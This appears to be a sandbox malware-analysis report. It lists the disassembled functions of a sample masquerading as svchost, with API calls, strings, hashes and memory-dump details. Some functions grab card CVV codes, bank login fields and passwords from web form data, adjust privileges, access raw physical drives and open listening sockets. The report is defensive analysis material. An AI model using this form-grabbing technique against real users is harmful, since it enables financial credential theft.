                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocfree$exit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 337157181-0
                                                                                                                                                                                                              • Opcode ID: 7c7a5bdad75330203568f6000a3b48ce82f5a2d71da85286c73fcf95971b3af6
                                                                                                                                                                                                              • Instruction ID: 98a440d4b9a67dc1f9baad687ef8dbc10def3c3b99de1e74d5d413968879cd1b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c7a5bdad75330203568f6000a3b48ce82f5a2d71da85286c73fcf95971b3af6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EF19FB1A00209ABDB20CF58D890BAEB7B5FF88714F644669FD45A7340DB71ED51CBA0
                                                                                                                                                                                                              Function 026533F0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 104fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02653411
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0269DDB4,?,?,?), ref: 02653428
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(0269DDB4,?,?,?), ref: 02653438
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02653465
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02653487
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,76F89300), ref: 026534B1
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 026534C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 026534D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 026534EA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02653655), ref: 02653507
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02653518
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                              • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                              • API String ID: 649538874-3292898883
                                                                                                                                                                                                              • Opcode ID: fcae9f3c2aff0cfe2077f126b346eb15be1853f557f60f7ee63ca67ae8b98b67
                                                                                                                                                                                                              • Instruction ID: af3aca4ce4e0fdf07823e0e3d2ec66e61a3401f7dd2cb279d897c43da842a5e0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcae9f3c2aff0cfe2077f126b346eb15be1853f557f60f7ee63ca67ae8b98b67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80313471981324BBE7209B54DC49FEE77AC9F05B14F004684FA45AA2C0DBF05A908BE5
                                                                                                                                                                                                              Function 0266DAE8 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 135filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 0266DB7A
                                                                                                                                                                                                              • strchr.MSVCRT ref: 0266DB89
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 0266DC75
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0266DC89
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              • API String ID: 23527507-2295261572
                                                                                                                                                                                                              • Opcode ID: f7ce7fce8b587f856ed24b90def2dbd611eaf839151745134e3a5dfefd07ca9e
                                                                                                                                                                                                              • Instruction ID: 634c67e06aa12b13770150941d51b21921dc60a78af066b429362ec43f6150f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7ce7fce8b587f856ed24b90def2dbd611eaf839151745134e3a5dfefd07ca9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60418BB1B0024E9FEF258B24CC687FE7BA1EF42304F1446D5D98A97284D771AA85CB51
                                                                                                                                                                                                              Function 0264D970 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                              • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                              • API String ID: 776485234-1938657081
                                                                                                                                                                                                              • Opcode ID: db8e894f3993d1ffe6e62a56c9dc4dd5b4e957fb87abe0b77f3703b48ccf4c3a
                                                                                                                                                                                                              • Instruction ID: a072eb764e87c7c4c154f1e7e78890fd90fea1eea0793e8bae2b5e17ce398c83
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db8e894f3993d1ffe6e62a56c9dc4dd5b4e957fb87abe0b77f3703b48ccf4c3a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 560128726E021876F330BE95DC4BCBB37D8DF856697D10315F88792940E9916D40CAB3
                                                                                                                                                                                                              Function 00401E00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 731831024-2333288578
                                                                                                                                                                                                              • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                              Function 02671250 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02671278
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0267128E
                                                                                                                                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 026712A8
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 026712B3
                                                                                                                                                                                                              • bind.WS2_32(00000000,?,00000010), ref: 026712CB
                                                                                                                                                                                                              • listen.WS2_32(00000000,00000005), ref: 026712D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: bindclosesockethtonslistensetsockoptsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4126956815-0
                                                                                                                                                                                                              • Opcode ID: d9a42166d4ffc6cf9cee9de1f3859d677751f5b3875eacf87225ffec2efa65f4
                                                                                                                                                                                                              • Instruction ID: 34087550c2c5d916f7ec4b6fa136ff59728fa88535129d793c8cdaf23f26fa5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9a42166d4ffc6cf9cee9de1f3859d677751f5b3875eacf87225ffec2efa65f4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0911C635B90205BBD7109B64EC09BDF77B9AF15711F404355FF05E62C0E7B09A508BA2
                                                                                                                                                                                                              Function 02662B40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02662B5E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02662B83
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02662B95
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileModuleNamememset
                                                                                                                                                                                                              • String ID: \clmain.exe
                                                                                                                                                                                                              • API String ID: 350293641-582869414
                                                                                                                                                                                                              • Opcode ID: cf78ca50538535b700e67c9fbe19bb8d8d3589fd8f32f218ac0bce7d446352cc
                                                                                                                                                                                                              • Instruction ID: 37a7cde512e01168ca4848c28f211c13e3225c53e27edce1f8bb4b3e2b401c06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf78ca50538535b700e67c9fbe19bb8d8d3589fd8f32f218ac0bce7d446352cc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46F0A7B1A84208ABDB64EA749C8ABF973A89B14705F4007E9BB4EC51C0FBF115D4CB91
                                                                                                                                                                                                              Function 0266E0FB Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 0266E119
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 0266E15E
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0266E1D2
                                                                                                                                                                                                              • free.MSVCRT ref: 0266E1FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2496910992-0
                                                                                                                                                                                                              • Opcode ID: 496479e41a06ddf1d6b1319a28916e6c27a6de5b321c17772abd383643aecf46
                                                                                                                                                                                                              • Instruction ID: ea2d152de8db66517c3c06f44bef1b7995ecfb262d34565c9387608ab631708f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 496479e41a06ddf1d6b1319a28916e6c27a6de5b321c17772abd383643aecf46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5315D7670024E8FDB00CE98EC88AFEBB54EB45315F1406A6E94587340E7328556CBE2
                                                                                                                                                                                                              Function 02660810 Relevance: 93.1, APIs: 46, Strings: 7, Instructions: 383memorysleepstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02660830
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a75f), ref: 02660857
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02660895
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0266089F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 026608A7
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026608B9
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 026608C0
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 026608FC
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0266090A
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a75f,?,?), ref: 02660945
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0266097F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02660989
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02660991
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026609A0
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 026609A7
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 026609D5
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02660A00
                                                                                                                                                                                                              • memset.MSVCRT ref: 02660A4B
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,?,?), ref: 02660A65
                                                                                                                                                                                                              • memset.MSVCRT ref: 02660AA8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002,?,?,?), ref: 02660AC2
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,0268A5BC,00000002,?,?,?), ref: 02660AE7
                                                                                                                                                                                                              • memset.MSVCRT ref: 02660B2A
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,pubkeys.key,00000104,?,secret.key,00000002,?,?,?), ref: 02660B44
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002,?,?,?), ref: 02660B69
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02660BA1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02660BA4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02660BB0
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02660BB3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?,?,?), ref: 02660BC0
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02660BE6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?), ref: 02660C08
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},00000006,00000010,00000000,00000000,00000000,?), ref: 02660C23
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 02660C2E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?), ref: 02660C39
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?), ref: 02660C40
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,?,?), ref: 02660C50
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02660C62
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002,?,?,?), ref: 02660C8F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02660C92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02660C9F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02660CA2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002,?,?,?), ref: 02660CAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02660CAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 02660CBF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 02660CC2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ErrorFreeLastPathSecuritymemset$CreateDescriptorDirectoryFileSleepValidatelstrcpyn$AdminAttributesBackslashFolderHandleMakeMutexSystemUser$CloseConvertCurrentDeleteInfoInformationLocalNamedReleaseSaclString
                                                                                                                                                                                                              • String ID: 8a99a75f$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$S:(ML;;NRNWNX;;;LW)$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                              • API String ID: 1233543684-3133241077
                                                                                                                                                                                                              • Opcode ID: 0c95a98ef21ac519a611d22a0c1b2beb9238293cb20b5e5ac4fcdf1e96838cee
                                                                                                                                                                                                              • Instruction ID: 3c759b5665824ce623b4b1c863d6cda4eb07a2ec58b2711e605778d599bfbaec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c95a98ef21ac519a611d22a0c1b2beb9238293cb20b5e5ac4fcdf1e96838cee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AD1E370944381AFE7219B649C5CFBF7BE9BF89704F444A28F58697240EB74D448CBA2
                                                                                                                                                                                                              Function 026589D0 Relevance: 91.4, APIs: 37, Strings: 15, Instructions: 400threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 026589F2
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,02650BE3), ref: 02658A0F
                                                                                                                                                                                                                • Part of subcall function 02654170: GetProcessHeap.KERNEL32(00000008,02650BF7,02650BE3,?,02658A25,?,?,?), ref: 02654181
                                                                                                                                                                                                                • Part of subcall function 02654170: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02654188
                                                                                                                                                                                                                • Part of subcall function 02654170: memset.MSVCRT ref: 02654198
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,02650BE3,?,?,?), ref: 02658A35
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvv=,00000000,76F8F380,00000000,00000001,00000000,?,?,?,02658A44,?,?,?,?,?), ref: 0265E433
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E441
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02658A44,?,?,?,?,?,?), ref: 0265E44D
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E45B
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02658A44,?,?,?,?,?,?), ref: 0265E467
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E479
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: strstr.MSVCRT ref: 0265E48F
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: strstr.MSVCRT ref: 0265E4A2
                                                                                                                                                                                                                • Part of subcall function 0265E3F0: GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 0265E50B
                                                                                                                                                                                                                • Part of subcall function 026644A0: strstr.MSVCRT ref: 026644DC
                                                                                                                                                                                                                • Part of subcall function 026644A0: strstr.MSVCRT ref: 026644EF
                                                                                                                                                                                                                • Part of subcall function 026644A0: strstr.MSVCRT ref: 02664502
                                                                                                                                                                                                                • Part of subcall function 026644A0: PathAddBackslashA.SHLWAPI(0269D2A0), ref: 02664528
                                                                                                                                                                                                                • Part of subcall function 026644A0: PathAddBackslashA.SHLWAPI(0269D2A0), ref: 02664562
                                                                                                                                                                                                                • Part of subcall function 026644A0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 026645CD
                                                                                                                                                                                                                • Part of subcall function 026644A0: GetLastError.KERNEL32 ref: 026645D7
                                                                                                                                                                                                                • Part of subcall function 02661A60: strstr.MSVCRT ref: 02661A83
                                                                                                                                                                                                                • Part of subcall function 02661A60: strstr.MSVCRT ref: 02661A92
                                                                                                                                                                                                                • Part of subcall function 02661A60: strstr.MSVCRT ref: 02661AA1
                                                                                                                                                                                                                • Part of subcall function 02661A60: PathAddBackslashA.SHLWAPI(0269D4A8), ref: 02661ACD
                                                                                                                                                                                                                • Part of subcall function 02661A60: PathAddBackslashA.SHLWAPI(0269D4A8), ref: 02661B03
                                                                                                                                                                                                                • Part of subcall function 02661A60: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02661B6C
                                                                                                                                                                                                                • Part of subcall function 02661A60: GetLastError.KERNEL32 ref: 02661B76
                                                                                                                                                                                                                • Part of subcall function 02661A60: IsUserAnAdmin.SHELL32 ref: 02661B7E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_username=,00000000,00000000,?,?,?,?,?,?), ref: 02658A5C
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_password=,?,?,?,?,?,?), ref: 02658A6C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A6EF,?,?,?,?,?,?), ref: 02658A9D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,8A99A6EF,?,?,?,?,?,?), ref: 02658AAB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02658AB8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A6EF,?,?,?,?,?,?), ref: 02658ABF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,command=auth_loginByPassword&back_command=&back_custom1=&,?,?,?,?,?,?), ref: 02658B2E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a6dd,?,?,?,?,?,?), ref: 02658B5D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,8a99a6dd,?,?,?,?,?,?), ref: 02658B6B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02658B78
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a6dd,?,?,?,?,?,?), ref: 02658B7F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edClientLogin=,?,?,?,?,?,?), ref: 02658BF3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edUserLogin=,?,?,?,?,?,?), ref: 02658C03
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edPassword=,?,?,?,?,?,?), ref: 02658C13
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A63B,?,?,?,?,?,?), ref: 02658C3D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,8A99A63B,?,?,?,?,?,?), ref: 02658C4B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02658C58
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A63B,?,?,?,?,?,?), ref: 02658C5F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&LOGIN_AUTHORIZATION_CODE=,?,?,?,?,?,?), ref: 02658CCF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a7e1,?,?,?,?,?,?), ref: 02658CFD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,8a99a7e1,?,?,?,?,?,?), ref: 02658D0B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02658D18
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a7e1,?,?,?,?,?,?), ref: 02658D1F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,action=auth&np=&login=,?,?,?,?,?,?), ref: 02658D93
